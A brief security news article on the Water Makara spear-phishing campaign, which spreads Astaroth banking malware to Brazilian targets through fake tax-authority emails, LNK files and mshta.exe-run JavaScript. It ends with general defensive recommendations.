New Wave of Astaroth Banking Malware via Spear-Phishing Scams

A new spear-phishing campaign is targeting Brazilian users, delivering the notorious Astaroth (also known as Guildma) banking malware by employing obfuscated JavaScript to bypass security defenses.

According to a report, this campaign has heavily impacted industries such as manufacturing, retail, and government agencies. The phishing emails often disguise themselves as official tax-related documents, using the urgency of income tax filing to lure victims into downloading the malicious software.

The campaign, tracked under the name Water Makara by cybersecurity researchers, bears similarities to a previous attack, which Google’s Threat Analysis Group (TAG) named PINEAPPLE.

Both campaigns rely on phishing emails that impersonate reputable organizations like Receita Federal, Brazil’s federal tax authority. Victims are tricked into downloading a ZIP file containing what appears to be tax documents, but is actually a Windows shortcut (LNK) file.

Once opened, the malicious LNK file exploits mshta.exe, a legitimate Windows tool, to execute obfuscated JavaScript commands. These commands connect to a remote command-and-control (C2) server, initiating the malware installation process.

Although Astaroth has been around for some time, it has evolved, making it a persistent and sophisticated threat. Beyond stealing sensitive financial information, the malware can cause long-term damage to businesses, eroding consumer trust, increasing the risk of regulatory penalties, and leading to significant downtime and costly recovery efforts.

To protect against such spear-phishing attacks, users should implement strong password policies, enable multi-factor authentication (MFA), and ensure that all security software and systems are kept up to date.

Organizations should also apply the principle of least privilege (PoLP) to minimize the risk of malware spreading within their networks.